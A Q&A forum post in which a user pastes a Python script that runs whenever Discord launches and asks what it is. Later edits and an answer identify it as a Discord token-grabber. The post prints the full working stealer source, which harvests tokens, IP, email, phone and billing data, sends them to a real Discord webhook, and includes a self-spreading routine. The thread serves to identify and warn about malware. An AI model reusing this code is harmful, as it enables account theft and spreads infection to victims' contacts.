Someone contacted me with a problem regarding Discord. The code below was brought to my attention as it was run around the time the problems began. Windows asks what program the code below should be run with and the default is Discord. Every time Discord is run, this chunk of code is run:
import os if os.name != "nt": exit() from re import findall from json import loads, dumps from base64 import b64decode from subprocess import Popen, PIPE from urllib.request import Request, urlopen from datetime import datetime from threading import Thread from time import sleep from sys import argv LOCAL = os.getenv("LOCALAPPDATA") ROAMING = os.getenv("APPDATA") PATHS = { "Discord" : ROAMING + "\Discord", "Discord Canary" : ROAMING + "\discordcanary", "Discord PTB" : ROAMING + "\discordptb", "Google Chrome" : LOCAL + "\Google\Chrome\User Data\Default", "Opera" : ROAMING + "\Opera Software\Opera Stable", "Brave" : LOCAL + "\BraveSoftware\Brave-Browser\User Data\Default", "Yandex" : LOCAL + "\Yandex\YandexBrowser\User Data\Default" } def getheaders(token=None, content_type="application/json"): headers = { "Content-Type": content_type, "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11" } if token: headers.update({"Authorization": token}) return headers def getuserdata(token): try: return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode()) except: pass def gettokens(path): path += "\Local Storage\leveldb" tokens = [] for file_name in os.listdir(path): if not file_name.endswith(".log") and not file_name.endswith(".ldb"): continue for line in [x.strip() for x in open(f"{path}\{file_name}", errors="ignore").readlines() if x.strip()]: for regex in (r"[w-]{24}.[w-]{6}.[w-]{27}", r"mfa.[w-]{84}"): for token in findall(regex, line): tokens.append(token) return tokens def getdeveloper(): dev = "wodx" try: dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode() except: pass return dev def getip(): ip = "None" try: ip = urlopen(Request("https://api.ipify.org")).read().decode().strip() except: pass return ip def getavatar(uid, aid): url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif" try: urlopen(Request(url)) except: url = url[:-4] return url def gethwid(): p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE) return (p.stdout.read() + p.stderr.read()).decode().split("n")[1] def getfriends(token): try: return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode()) except: pass def getchat(token, uid): try: return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"] except: pass def has_payment_methods(token): try: return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0) except: pass def send_message(token, chat_id, form_data): try: urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode() except: pass def spread(token, form_data, delay): return # Remove to re-enabled for friend in getfriends(token): try: chat_id = getchat(token, friend["id"]) send_message(token, chat_id, form_data) except Exception as e: pass sleep(delay) def main(): cache_path = ROAMING + "\.cache~$" prevent_spam = True self_spread = True embeds = [] working = [] checked = [] already_cached_tokens = [] working_ids = [] ip = getip() pc_username = os.getenv("UserName") pc_name = os.getenv("COMPUTERNAME") user_path_name = os.getenv("userprofile").split("\")[2] developer = getdeveloper() for platform, path in PATHS.items(): if not os.path.exists(path): continue for token in gettokens(path): if token in checked: continue checked.append(token) uid = None if not token.startswith("mfa."): try: uid = b64decode(token.split(".")[0].encode()).decode() except: pass if not uid or uid in working_ids: continue user_data = getuserdata(token) if not user_data: continue working_ids.append(uid) working.append(token) username = user_data["username"] + "#" + str(user_data["discriminator"]) user_id = user_data["id"] avatar_id = user_data["avatar"] avatar_url = getavatar(user_id, avatar_id) email = user_data.get("email") phone = user_data.get("phone") nitro = bool(user_data.get("premium_type")) billing = bool(has_payment_methods(token)) embed = { "color": 0x0eec59, "fields": [ { "name": "**Account Info**", "value": f'Email: {email}nPhone: {phone}nNitro: {nitro}nBilling Info: {billing}', "inline": True }, { "name": "**PC Info**", "value": f'IP: {ip}nUsername: {pc_username}nPC Name: {pc_name}nToken Location: {platform}', "inline": True }, { "name": "**Token**", "value": token, "inline": False } ], "author": { "name": f"{username} ({user_id})", "icon_url": avatar_url }, "footer": { "text": f"Token grabber by THC4L" } } embeds.append(embed) with open(cache_path, "a") as file: for token in checked: if not token in already_cached_tokens: file.write(token + "n") if len(working) == 0: working.append('123') webhook = { "content": "", "embeds": embeds, "username": "THC4L", "avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png" } try: urlopen(Request("https://discord.com/api/webhooks/799694650549862420/rFrqEzYaTC7uS353j0HIWZaxGfxe_B6X1aTsPRY_hWOkWQIecm70fKLwMbfb8wyPz2VB", data=dumps(webhook).encode(), headers=getheaders())) except: pass if self_spread: for token in working: with open(argv[0], encoding="utf-8") as file: content = file.read() payload = f'-----------------------------325414537030329320151394843687nContent-Disposition: form-data; name="file"; filename="{__file__}"nContent-Type: text/plainnn{content}n-----------------------------325414537030329320151394843687nContent-Disposition: form-data; name="content"nnserver crasher. python download: https://www.python.org/downloadsn-----------------------------325414537030329320151394843687nContent-Disposition: form-data; name="tts"nnfalsen-----------------------------325414537030329320151394843687--' Thread(target=spread, args=(token, payload, 7500 / 1000)).start() try: main() except Exception as e: print(e) pass
Any idea what this could be? I can see: for token in gettokens(path):
and "text": f"Token grabber by THC4L"
It almost looks like a Discord token skimmer. It looks like it takes phone numbers, usernames, account info, PC info and more…
EDIT:
THIS IS MALWARE. This is a token logger for the Discord desktop app. It also looks in your browser for other discord-related information.
It has been reviewed in greater depth here:
https://www.youtube.com/watch?v=s3wS1Dd3FFs&feature=youtu.be
The scriptwriter gives some very insightful information in the Pastebin link he provided and I would encourage you to check it out: https://pastebin.com/0q0Fk0Ej
It specificaly tries to pull:
- Public ip address
- Discord tokens
- Discord friends
- Discord friend’s ids
- Dicord username
- Discord user id
- Discord email
- Discord nitro (checks if you have it)
- Phone number
- Billing onfo
- PC username
- PC name
- PC platform
Since removed YouTube account promoting the script:
https://www.youtube.com/channel/UCydMtuzGQ0kFPhK2hIXFf6A
The creator’s Github account:
Advertisement
Answer
That is malware, not only a token logger but also stealing Chrome, Brave, Opera and Yandex passwords. Uninstall that immediately and change all your passwords.
YouTube channel of creator: https://www.youtube.com/channel/UCydMtuzGQ0kFPhK2hIXFf6A
update: As it turns out, it also steals your ip, yay!